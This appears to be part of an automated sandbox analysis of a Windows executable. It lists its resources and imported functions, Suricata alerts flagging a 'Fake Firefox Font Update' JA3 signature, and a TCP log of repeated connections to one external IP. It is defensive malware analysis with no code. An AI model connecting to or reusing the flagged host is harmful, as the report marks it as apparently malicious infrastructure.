                    RT_BITMAP0x1068740x128Device independent bitmap graphic, 21 x 16 x 4, image size 192EnglishUnited States0.3885135135135135
                    RT_BITMAP0x10699c0xe8Device independent bitmap graphic, 13 x 16 x 4, image size 128EnglishUnited States0.36637931034482757
                    RT_BITMAP0x106a840x128Device independent bitmap graphic, 17 x 16 x 4, image size 192EnglishUnited States0.3614864864864865
                    RT_BITMAP0x106bac0x128Device independent bitmap graphic, 20 x 16 x 4, image size 192EnglishUnited States0.3783783783783784
                    RT_BITMAP0x106cd40xd0Device independent bitmap graphic, 13 x 13 x 4, image size 104EnglishUnited States0.49038461538461536
                    RT_BITMAP0x106da40x128Device independent bitmap graphic, 21 x 16 x 4, image size 192EnglishUnited States0.3716216216216216
                    RT_BITMAP0x106ecc0x128Device independent bitmap graphic, 17 x 16 x 4, image size 192EnglishUnited States0.2905405405405405
                    RT_BITMAP0x106ff40x128Device independent bitmap graphic, 21 x 16 x 4, image size 192EnglishUnited States0.38175675675675674
                    RT_BITMAP0x10711c0x128Device independent bitmap graphic, 19 x 16 x 4, image size 192EnglishUnited States0.3783783783783784
                    RT_BITMAP0x1072440x128Device independent bitmap graphic, 21 x 16 x 4, image size 192EnglishUnited States0.3783783783783784
                    RT_BITMAP0x10736c0xe8Device independent bitmap graphic, 12 x 16 x 4, image size 128EnglishUnited States0.3620689655172414
                    RT_BITMAP0x1074540x128Device independent bitmap graphic, 17 x 16 x 4, image size 192EnglishUnited States0.3581081081081081
                    RT_BITMAP0x10757c0x128Device independent bitmap graphic, 20 x 16 x 4, image size 192EnglishUnited States0.375
                    RT_BITMAP0x1076a40xd0Device independent bitmap graphic, 13 x 13 x 4, image size 104EnglishUnited States0.47115384615384615
                    RT_BITMAP0x1077740x128Device independent bitmap graphic, 21 x 16 x 4, image size 192EnglishUnited States0.36824324324324326
                    RT_BITMAP0x10789c0x128Device independent bitmap graphic, 17 x 16 x 4, image size 192EnglishUnited States0.28716216216216217
                    RT_BITMAP0x1079c40x128Device independent bitmap graphic, 21 x 16 x 4, image size 192EnglishUnited States0.3885135135135135
                    RT_BITMAP0x107aec0x128Device independent bitmap graphic, 19 x 16 x 4, image size 192EnglishUnited States0.375
                    RT_BITMAP0x107c140x128Device independent bitmap graphic, 21 x 16 x 4, image size 192EnglishUnited States0.375
                    RT_BITMAP0x107d3c0xe8Device independent bitmap graphic, 13 x 16 x 4, image size 128EnglishUnited States0.36637931034482757
                    RT_BITMAP0x107e240x128Device independent bitmap graphic, 17 x 16 x 4, image size 192EnglishUnited States0.35135135135135137
                    RT_BITMAP0x107f4c0x128Device independent bitmap graphic, 20 x 16 x 4, image size 192EnglishUnited States0.36486486486486486
                    RT_BITMAP0x1080740xd0Device independent bitmap graphic, 13 x 13 x 4, image size 104EnglishUnited States0.47115384615384615
                    RT_BITMAP0x1081440x128Device independent bitmap graphic, 21 x 16 x 4, image size 192EnglishUnited States0.3581081081081081
                    RT_BITMAP0x10826c0x128Device independent bitmap graphic, 17 x 16 x 4, image size 192EnglishUnited States0.28716216216216217
                    RT_BITMAP0x1083940xe8Device independent bitmap graphic, 16 x 16 x 4, image size 128EnglishUnited States0.4870689655172414
                    RT_ICON0x10847c0x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 40314 x 40314 px/m0.40560165975103735
                    RT_DIALOG0x10aa240x52data0.7682926829268293
                    RT_DIALOG0x10aa780x52data0.7560975609756098
                    RT_STRING0x10aacc0x35cdata0.45348837209302323
                    RT_STRING0x10ae280x2d8data0.4642857142857143
                    RT_STRING0x10b1000xc0data0.6770833333333334
                    RT_STRING0x10b1c00xecdata0.6483050847457628
                    RT_STRING0x10b2ac0x350data0.43514150943396224
                    RT_STRING0x10b5fc0x3ccdata0.37962962962962965
                    RT_STRING0x10b9c80x388data0.4092920353982301
                    RT_STRING0x10bd500x418data0.36736641221374045
                    RT_STRING0x10c1680x140data0.515625
                    RT_STRING0x10c2a80xccdata0.6127450980392157
                    RT_STRING0x10c3740x1ecdata0.5345528455284553
                    RT_STRING0x10c5600x3b0data0.326271186440678
                    RT_STRING0x10c9100x354data0.4107981220657277
                    RT_STRING0x10cc640x2a4data0.4363905325443787
                    RT_RCDATA0x10cf080x10data1.5
                    RT_RCDATA0x10cf180x338data0.6905339805825242
                    RT_RCDATA0x10d2500x1657cGIF image data, version 89a, 360 x 360EnglishUnited States0.5910441889942742
                    RT_RCDATA0x1237cc0x369Delphi compiled form 'TForm1'0.6071019473081328
                    RT_GROUP_CURSOR0x123b380x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                    RT_GROUP_CURSOR0x123b4c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                    RT_GROUP_CURSOR0x123b600x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                    RT_GROUP_CURSOR0x123b740x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                    RT_GROUP_CURSOR0x123b880x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                    RT_GROUP_CURSOR0x123b9c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                    RT_GROUP_CURSOR0x123bb00x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                    RT_GROUP_ICON0x123bc40x14data1.25

                    Imports

                    DLLImport
                    oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                    advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                    user32.dllGetKeyboardType, DestroyWindow, LoadStringA, MessageBoxA, CharNextA
                    kernel32.dllGetACP, Sleep, VirtualFree, VirtualAlloc, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, CompareStringA, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
                    kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
                    user32.dllCreateWindowExA, WindowFromPoint, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExA, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageW, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageW, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageW, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessagePos, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameA, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDlgItem, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClientRect, GetClassLongA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageW, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
                    gdi32.dllUnrealizeObject, StretchBlt, SetWindowOrgEx, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, RectVisible, RealizePalette, Polyline, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectA, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, ExcludeClipRect, DeleteObject, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, BitBlt
                    version.dllVerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
                    kernel32.dlllstrcpyA, lstrcatA, _lread, _lopen, _llseek, _lclose, WriteFile, WaitForSingleObject, VirtualQuery, VirtualAlloc, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MultiByteToWideChar, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalFindAtomA, GlobalDeleteAtom, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetStdHandle, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCPInfo, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
                    advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegFlushKey, RegCloseKey
                    oleaut32.dllCreateErrorInfo, GetErrorInfo, SetErrorInfo, SysFreeString
                    ole32.dllCoCreateInstance, CoUninitialize, CoInitialize
                    kernel32.dllSleep
                    oleaut32.dllSafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
                    comctl32.dll_TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
                    comdlg32.dllGetOpenFileNameA

                    Possible Origin

                    Language of compilation systemCountry where language is spokenMap
                    EnglishUnited States

                    Network Behavior

                    Suricata IDS Alerts

                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                    2025-01-14T08:24:10.558255+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649718166.62.27.188443TCP
                    2025-01-14T08:24:12.405250+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649736166.62.27.188443TCP
                    2025-01-14T08:24:14.338304+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649748166.62.27.188443TCP
                    2025-01-14T08:24:16.296521+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649761166.62.27.188443TCP
                    2025-01-14T08:24:18.281135+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649777166.62.27.188443TCP
                    2025-01-14T08:24:20.231335+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649794166.62.27.188443TCP
                    2025-01-14T08:24:22.182065+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649806166.62.27.188443TCP
                    2025-01-14T08:24:24.136166+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649824166.62.27.188443TCP
                    2025-01-14T08:24:26.166228+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649841166.62.27.188443TCP
                    2025-01-14T08:24:28.131820+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649856166.62.27.188443TCP
                    2025-01-14T08:24:30.078952+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649871166.62.27.188443TCP
                    2025-01-14T08:24:32.007116+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649881166.62.27.188443TCP
                    2025-01-14T08:24:34.045606+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649896166.62.27.188443TCP
                    2025-01-14T08:24:35.982748+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649909166.62.27.188443TCP
                    2025-01-14T08:24:37.942258+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649926166.62.27.188443TCP
                    2025-01-14T08:24:39.916563+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649941166.62.27.188443TCP
                    2025-01-14T08:24:41.844140+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649953166.62.27.188443TCP
                    2025-01-14T08:24:43.798640+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649966166.62.27.188443TCP
                    2025-01-14T08:24:46.605744+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649982166.62.27.188443TCP
                    2025-01-14T08:24:48.526451+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649998166.62.27.188443TCP
                    2025-01-14T08:24:50.493883+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650010166.62.27.188443TCP
                    2025-01-14T08:24:52.428494+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650027166.62.27.188443TCP
                    2025-01-14T08:24:54.368392+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650029166.62.27.188443TCP
                    2025-01-14T08:24:56.342749+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650031166.62.27.188443TCP
                    2025-01-14T08:24:58.286247+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650033166.62.27.188443TCP
                    2025-01-14T08:25:00.225958+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650035166.62.27.188443TCP
                    2025-01-14T08:25:02.169327+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650038166.62.27.188443TCP
                    2025-01-14T08:25:04.209196+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650040166.62.27.188443TCP
                    2025-01-14T08:25:06.190632+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650042166.62.27.188443TCP
                    2025-01-14T08:25:08.118909+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650044166.62.27.188443TCP
                    2025-01-14T08:25:10.033109+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650046166.62.27.188443TCP
                    2025-01-14T08:25:11.978018+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650048166.62.27.188443TCP
                    2025-01-14T08:25:13.976443+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650050166.62.27.188443TCP
                    2025-01-14T08:25:15.909470+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650052166.62.27.188443TCP
                    2025-01-14T08:25:17.885246+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650055166.62.27.188443TCP
                    2025-01-14T08:25:19.825410+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650057166.62.27.188443TCP
                    2025-01-14T08:25:21.755181+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650059166.62.27.188443TCP
                    2025-01-14T08:25:23.714602+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650061166.62.27.188443TCP
                    2025-01-14T08:25:25.647828+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650063166.62.27.188443TCP
                    2025-01-14T08:25:27.568751+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650065166.62.27.188443TCP
                    2025-01-14T08:25:29.504572+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650067166.62.27.188443TCP
                    2025-01-14T08:25:31.480033+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650069166.62.27.188443TCP
                    2025-01-14T08:25:33.452995+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650071166.62.27.188443TCP
                    2025-01-14T08:25:35.378327+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650073166.62.27.188443TCP
                    2025-01-14T08:25:37.276138+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650075166.62.27.188443TCP
                    2025-01-14T08:25:39.232950+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650077166.62.27.188443TCP
                    2025-01-14T08:25:41.165641+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650079166.62.27.188443TCP
                    2025-01-14T08:25:43.065507+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650081166.62.27.188443TCP
                    2025-01-14T08:25:44.969186+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650083166.62.27.188443TCP
                    2025-01-14T08:25:46.871981+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650085166.62.27.188443TCP
                    2025-01-14T08:25:48.773009+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650087166.62.27.188443TCP
                    2025-01-14T08:25:50.688170+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650090166.62.27.188443TCP
                    2025-01-14T08:25:52.611704+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650092166.62.27.188443TCP
                    2025-01-14T08:25:54.516715+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650094166.62.27.188443TCP
                    2025-01-14T08:25:56.420846+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650096166.62.27.188443TCP
                    2025-01-14T08:25:58.402905+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650098166.62.27.188443TCP
                    2025-01-14T08:26:00.326241+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650100166.62.27.188443TCP
                    2025-01-14T08:26:02.259162+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650102166.62.27.188443TCP
                    2025-01-14T08:26:04.207809+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650104166.62.27.188443TCP
                    2025-01-14T08:26:06.144655+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650106166.62.27.188443TCP
                    2025-01-14T08:26:08.062325+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650108166.62.27.188443TCP
                    2025-01-14T08:26:09.994141+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650110166.62.27.188443TCP
                    2025-01-14T08:26:11.902567+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650112166.62.27.188443TCP

                    Network Port Distribution

                    TCP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    Jan 14, 2025 08:24:08.155232906 CET4971180192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:08.160079956 CET8049711166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:08.160217047 CET4971180192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:08.160402060 CET4971180192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:08.165277958 CET8049711166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:08.165354967 CET4971180192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:08.185177088 CET4971280192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:08.190244913 CET8049712166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:08.190376997 CET4971280192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:08.190970898 CET4971280192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:08.195827961 CET8049712166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:09.177887917 CET8049712166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:09.219887972 CET49718443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:09.219935894 CET44349718166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:09.220063925 CET49718443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:09.228143930 CET4971280192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:09.248644114 CET49718443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:09.248676062 CET44349718166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:10.558161974 CET44349718166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:10.558254957 CET49718443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:10.559910059 CET49718443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:10.559937954 CET44349718166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:10.560200930 CET44349718166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:10.616175890 CET49718443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:10.657862902 CET49718443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:10.703330994 CET44349718166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:10.986108065 CET44349718166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:10.986406088 CET44349718166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:10.986579895 CET49718443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:11.004404068 CET49718443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:11.004404068 CET49718443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:11.004446030 CET44349718166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:11.004458904 CET44349718166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:11.160078049 CET4973080192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:11.164953947 CET8049730166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:11.165086985 CET4973080192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:11.165324926 CET4973080192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:11.170150042 CET8049730166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:11.170636892 CET4973080192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:11.171236992 CET4971280192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:11.176034927 CET8049712166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:11.481756926 CET8049712166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:11.507746935 CET49736443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:11.507796049 CET44349736166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:11.507862091 CET49736443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:11.509228945 CET49736443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:11.509249926 CET44349736166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:11.526166916 CET4971280192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:12.405183077 CET44349736166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:12.405250072 CET49736443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:12.406682014 CET49736443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:12.406693935 CET44349736166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:12.406985044 CET44349736166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:12.408144951 CET49736443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:12.455333948 CET44349736166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:12.992620945 CET44349736166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:12.993036985 CET44349736166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:12.993107080 CET49736443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:12.993168116 CET49736443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:12.993189096 CET44349736166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:12.993200064 CET49736443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:12.993205070 CET44349736166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:13.127578020 CET4974780192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:13.132503033 CET8049747166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:13.132577896 CET4974780192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:13.133568048 CET4974780192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:13.135656118 CET4971280192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:13.138382912 CET8049747166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:13.138437033 CET4974780192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:13.140453100 CET8049712166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:13.446264982 CET8049712166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:13.447669029 CET49748443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:13.447730064 CET44349748166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:13.447812080 CET49748443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:13.448112965 CET49748443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:13.448132992 CET44349748166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:13.487248898 CET4971280192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:14.337459087 CET44349748166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:14.338304043 CET49748443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:14.341144085 CET49748443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:14.341173887 CET44349748166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:14.341548920 CET44349748166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:14.343301058 CET49748443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:14.387332916 CET44349748166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:14.918643951 CET44349748166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:14.918957949 CET44349748166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:14.919023991 CET49748443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:14.919102907 CET49748443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:14.919123888 CET44349748166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:14.919138908 CET49748443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:14.919146061 CET44349748166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:15.054723978 CET4975980192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:15.059608936 CET8049759166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:15.059685946 CET4975980192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:15.059834957 CET4975980192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:15.064657927 CET8049759166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:15.064707994 CET4975980192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:15.077289104 CET4971280192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:15.082217932 CET8049712166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:15.387444973 CET8049712166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:15.388695002 CET49761443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:15.388732910 CET44349761166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:15.388787985 CET49761443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:15.389072895 CET49761443192.168.2.6166.62.27.188
